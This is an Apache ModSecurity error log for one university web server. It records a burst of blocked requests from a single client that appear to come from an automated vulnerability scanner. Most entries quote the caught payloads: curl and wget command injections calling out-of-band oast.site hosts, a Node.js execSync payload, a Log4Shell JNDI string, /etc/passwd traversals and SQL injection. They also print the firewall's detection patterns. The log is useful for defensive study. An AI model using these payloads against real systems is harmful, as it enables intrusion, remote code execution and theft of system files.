[Tue Aug 29 11:33:14.393725 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARNk9gAAAAS"]
[Tue Aug 29 11:33:14.463848 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARYxDYAAAAJ"]
[Tue Aug 29 11:33:18.123058 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg83ahfsnnts4ie.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARjjLIAAAAL"]
[Tue Aug 29 11:33:18.692651 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg9mtc3o4jz9jqo.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmHwAAAAR"]
[Tue Aug 29 11:33:18.987319 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARQ38YAAAAB"]
[Tue Aug 29 11:33:19.045569 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARu2qMAAAAW"]
[Tue Aug 29 11:33:19.079251 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARzXwUAAAAd"]
[Tue Aug 29 11:33:19.316147 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARQ38wAAAAB"]
[Tue Aug 29 11:33:19.319275 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARy-sUAAAAb"]
[Tue Aug 29 11:33:20.300272 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EMCo-f0AAARA7fYAAAAA"]
[Tue Aug 29 11:33:22.328840 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgdo5tqewcpcxzr.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARzXw0AAAAd"]
[Tue Aug 29 11:33:22.451659 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARpgyIAAAAU"]
[Tue Aug 29 11:33:23.300331 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlg97fu95pku1gf1.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11E8Co-f0AAARpgyMAAAAU"]
[Tue Aug 29 11:33:23.382850 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARwusEAAAAZ"]
[Tue Aug 29 11:33:24.369205 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARdiJAAAAAK"]
[Tue Aug 29 11:33:25.331781 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARt-8kAAAAV"]
[Tue Aug 29 11:33:25.340544 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARTEOMAAAAG"]
[Tue Aug 29 11:33:25.358455 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARQ398AAAAB"]
[Tue Aug 29 11:33:26.487346 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARu2r0AAAAW"]
[Tue Aug 29 11:33:26.490058 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgq4pryn6keqooe.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARdiJYAAAAK"]
[Tue Aug 29 11:33:27.308137 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARdiJcAAAAK"]
[Tue Aug 29 11:33:27.328783 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARQ3@QAAAAB"]
[Tue Aug 29 11:33:27.374400 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARLXwkAAAAQ"]
[Tue Aug 29 11:33:29.352140 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARy-uMAAAAb"]
[Tue Aug 29 11:33:29.403671 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARv7RsAAAAY"]
[Tue Aug 29 11:33:29.406562 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibfh.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARv7RsAAAAY"]
[Tue Aug 29 11:33:32.043167 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARv7SUAAAAY"]
[Tue Aug 29 11:33:32.143215 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlg1rp1fh5bjokyp.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAASBXO8AAAAM"]
[Tue Aug 29 11:33:32.359545 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAASAHZQAAAAH"]
[Tue Aug 29 11:33:34.364518 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAASBXQEAAAAM"]
